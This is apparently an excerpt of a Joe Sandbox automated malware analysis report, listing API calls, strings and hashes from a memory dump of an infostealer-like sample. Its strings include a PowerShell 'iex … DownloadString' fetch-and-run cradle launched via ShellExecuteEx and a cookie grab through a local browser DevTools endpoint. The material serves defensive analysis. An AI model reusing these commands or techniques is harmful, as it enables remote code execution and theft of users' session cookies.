                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                          • API String ID: 2238633743-3087812094
                          • Opcode ID: 358ee30baf0eb4ce34c17037d4e17dda0cfbfb96f04e17d048dc216b6074b4a7
                          • Instruction ID: 5ecc791fe8432a510f8cba95fa925987b219d8255d532e157c76603307c11d7c
                          • Opcode Fuzzy Hash: 358ee30baf0eb4ce34c17037d4e17dda0cfbfb96f04e17d048dc216b6074b4a7
                          • Instruction Fuzzy Hash: 26113672953721AB8B329FA5BC0DAA63BB8FA29706304491BF551E6360DAF44408FF50
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BBE53
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BBE86
                          • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003BBE91
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BBEB1
                          • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003BBEBD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BBEE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003BBEEB
                          • lstrlen.KERNEL32(')"), ref: 003BBEF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BBF13
                          • lstrcat.KERNEL32(00000000,')"), ref: 003BBF1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BBF46
                          • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003BBF66
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BBF88
                          • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003BBF94
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BBFBA
                          • ShellExecuteEx.SHELL32(?), ref: 003BC00C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 4016326548-898575020
                          • Opcode ID: c16b0356c5b9f559e5281518e4fa010e27f9e2f7aeec3aa10b9ab0511c0841c3
                          • Instruction ID: 12ec9731ea84ca2213dad08035872358a59fbf9335dac97226cf3575027ab376
                          • Opcode Fuzzy Hash: c16b0356c5b9f559e5281518e4fa010e27f9e2f7aeec3aa10b9ab0511c0841c3
                          • Instruction Fuzzy Hash: 1361C631E11216ABCB23AFB89C89AEFBBB9EF15704F05042AF505D7611DF74C9058B90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C184F
                          • lstrlen.KERNEL32(00F16D10), ref: 003C1860
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1887
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003C1892
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C18C1
                          • lstrlen.KERNEL32(003D4FA0), ref: 003C18D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C18F4
                          • lstrcat.KERNEL32(00000000,003D4FA0), ref: 003C1900
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C192F
                          • lstrlen.KERNEL32(00F16D20), ref: 003C1945
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C196C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003C1977
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C19A6
                          • lstrlen.KERNEL32(003D4FA0), ref: 003C19B8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C19D9
                          • lstrcat.KERNEL32(00000000,003D4FA0), ref: 003C19E5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1A14
                          • lstrlen.KERNEL32(00F16D70), ref: 003C1A2A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1A51
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003C1A5C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1A8B
                          • lstrlen.KERNEL32(00F16D80), ref: 003C1AA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1AC8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003C1AD3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1B02
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen
                          • String ID:
                          • API String ID: 1049500425-0
                          • Opcode ID: 7954d0a323d9bd6a61ace437531aef1d00f225b9fc557145d120740d82c839af
                          • Instruction ID: bfcbc544e1ac2df967f4309df825bcc9a7f6ef414cae4c88740a1f2d52a7e1ff
                          • Opcode Fuzzy Hash: 7954d0a323d9bd6a61ace437531aef1d00f225b9fc557145d120740d82c839af
                          • Instruction Fuzzy Hash: 13910D75601703ABD722AFB9DC88F27B7E9EF16300B15442EA886C7662DB34EC45DB50
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B4793
                          • LocalAlloc.KERNEL32(00000040,?), ref: 003B47C5
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B4812
                          • lstrlen.KERNEL32(003D4B60), ref: 003B481D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B483A
                          • lstrcat.KERNEL32(00000000,003D4B60), ref: 003B4846
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B486B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4898
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B48A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B48CA
                          • StrStrA.SHLWAPI(?,00000000), ref: 003B48DC
                          • lstrlen.KERNEL32(?), ref: 003B48F0
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B4931
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B49B8
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B49E1
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B4A0A
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B4A30
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B4A5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 4107348322-3310892237
                          • Opcode ID: f6bcf0652a553749c2395f59ba0f9a565e5089666030b1684a8ea9d487551fbe
                          • Instruction ID: d13b3b56d95f26b5ba8c2db6624d4961e6387c9ba83b568901f2b48a3407e163
                          • Opcode Fuzzy Hash: f6bcf0652a553749c2395f59ba0f9a565e5089666030b1684a8ea9d487551fbe
                          • Instruction Fuzzy Hash: 12B19F31A112169BCB27EF68D889AAF77B5EF51704F054029F946EBA12DB30EC058B94
                          APIs
                            • Part of subcall function 003A90C0: InternetOpenA.WININET(003CCFEC,00000001,00000000,00000000,00000000), ref: 003A90DF
                            • Part of subcall function 003A90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003A90FC
                            • Part of subcall function 003A90C0: InternetCloseHandle.WININET(00000000), ref: 003A9109
                          • strlen.MSVCRT ref: 003A92E1
                          • strlen.MSVCRT ref: 003A92FA
                            • Part of subcall function 003A8980: std::_Xinvalid_argument.LIBCPMT ref: 003A8996
                          • strlen.MSVCRT ref: 003A9399
                          • strlen.MSVCRT ref: 003A93E6
                          • lstrcat.KERNEL32(?,cookies), ref: 003A9547
                          • lstrcat.KERNEL32(?,003D1794), ref: 003A9559
                          • lstrcat.KERNEL32(?,?), ref: 003A956A
                          • lstrcat.KERNEL32(?,003D4B98), ref: 003A957C
                          • lstrcat.KERNEL32(?,?), ref: 003A958D
                          • lstrcat.KERNEL32(?,.txt), ref: 003A959F
                          • lstrlen.KERNEL32(?), ref: 003A95B6
                          • lstrlen.KERNEL32(?), ref: 003A95DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A9614
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                          • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                          • API String ID: 1201316467-3542011879
                          • Opcode ID: 96035a3fcacbc210d0af7a45d089fb8e241b8b23722c3a8af540cca6a4338d6b
                          • Instruction ID: 780d6e6a500fb8ab3d6b12cb1b4fdd8ffc113cc8f2c70752858a72860c306e59
                          • Opcode Fuzzy Hash: 96035a3fcacbc210d0af7a45d089fb8e241b8b23722c3a8af540cca6a4338d6b
                          • Instruction Fuzzy Hash: C0E11871E10218EBDF16DFA8D885ADEBBB5FF59300F1044AAE509A7251EB309E45CF90
                          APIs
                          • memset.MSVCRT ref: 003BD9A1
                          • memset.MSVCRT ref: 003BD9B3
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003BD9DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BDA0E
                          • lstrcat.KERNEL32(?,00000000), ref: 003BDA1C
                          • lstrcat.KERNEL32(?,00F2EBF0), ref: 003BDA36
                          • lstrcat.KERNEL32(?,?), ref: 003BDA4A
                          • lstrcat.KERNEL32(?,00F2D690), ref: 003BDA5E
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BDA8E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 003BDA95
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BDAFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2367105040-0
                          • Opcode ID: 2e36cab6a63939e01a9f7cbaf8ff8a041adac12cdf8544cdbcc3dd9de8e63f83
                          • Instruction ID: 8e0611e614fbb01234f58b41eccaaae324867a7d21541ee7fe80a2e4e8d6b612
                          • Opcode Fuzzy Hash: 2e36cab6a63939e01a9f7cbaf8ff8a041adac12cdf8544cdbcc3dd9de8e63f83
                          • Instruction Fuzzy Hash: CAB1A271D10259AFDB22EFA4DC889EE77B9EF48304F14456AF606E7250EB309E44CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003AB330
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB37E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB3A9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003AB3B1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB3D9
                          • lstrlen.KERNEL32(003D4C50), ref: 003AB450
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB474
                          • lstrcat.KERNEL32(00000000,003D4C50), ref: 003AB480
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB4A9
                          • lstrlen.KERNEL32(00000000), ref: 003AB52D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB557
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003AB55F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB587
                          • lstrlen.KERNEL32(003D4AD4), ref: 003AB5FE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB622
                          • lstrcat.KERNEL32(00000000,003D4AD4), ref: 003AB62E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB65E
                          • lstrlen.KERNEL32(?), ref: 003AB767
                          • lstrlen.KERNEL32(?), ref: 003AB776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB79E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: 1b7a3e9d9635c9440e6da259ddd2c3e5b42af08ab3d925c6654c48c2a00f1dd3
                          • Instruction ID: b5cc61da3e15bbb9f6d6fe92364ef49282048daa9a6e7571f5d7bb6c15235806
                          • Opcode Fuzzy Hash: 1b7a3e9d9635c9440e6da259ddd2c3e5b42af08ab3d925c6654c48c2a00f1dd3
                          • Instruction Fuzzy Hash: A2024230A01215CFCB26DF69D949B6AF7B5FF56304F19806EE4099B262D771DC46CB80
                          APIs
                            • Part of subcall function 003C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003C71FE
                          • RegOpenKeyExA.ADVAPI32(?,00F28E68,00000000,00020019,?), ref: 003C37BD
                          • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 003C37F7
                          • wsprintfA.USER32 ref: 003C3822
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 003C3840
                          • RegCloseKey.ADVAPI32(?), ref: 003C384E
                          • RegCloseKey.ADVAPI32(?), ref: 003C3858
                          • RegQueryValueExA.ADVAPI32(?,00F2EA10,00000000,000F003F,?,?), ref: 003C38A1
                          • lstrlen.KERNEL32(?), ref: 003C38B6
                          • RegQueryValueExA.ADVAPI32(?,00F2E908,00000000,000F003F,?,00000400), ref: 003C3927
                          • RegCloseKey.ADVAPI32(?), ref: 003C3972
                          • RegCloseKey.ADVAPI32(?), ref: 003C3989
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 13140697-3278919252
                          • Opcode ID: 8f570686aba910e5c3dae83ffed475e111efd6864a550c839bd88b023e2bc73d
                          • Instruction ID: 8765368eb2e81353a5384d6e872dbbe8a9dd5a4b1c6a591bb2a620e1709eafda
                          • Opcode Fuzzy Hash: 8f570686aba910e5c3dae83ffed475e111efd6864a550c839bd88b023e2bc73d
                          • Instruction Fuzzy Hash: 169169729012099FCB21DFA4D984EEEB7B9FB48310F15856EE509EB211DB31AE45CF90
                          APIs
                          • InternetOpenA.WININET(003CCFEC,00000001,00000000,00000000,00000000), ref: 003A90DF
                          • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003A90FC
                          • InternetCloseHandle.WININET(00000000), ref: 003A9109
                          • InternetReadFile.WININET(?,?,?,00000000), ref: 003A9166
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 003A9197
                          • InternetCloseHandle.WININET(00000000), ref: 003A91A2
                          • InternetCloseHandle.WININET(00000000), ref: 003A91A9
                          • strlen.MSVCRT ref: 003A91BA
                          • strlen.MSVCRT ref: 003A91ED
                          • strlen.MSVCRT ref: 003A922E
                          • strlen.MSVCRT ref: 003A924C
                            • Part of subcall function 003A8980: std::_Xinvalid_argument.LIBCPMT ref: 003A8996
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
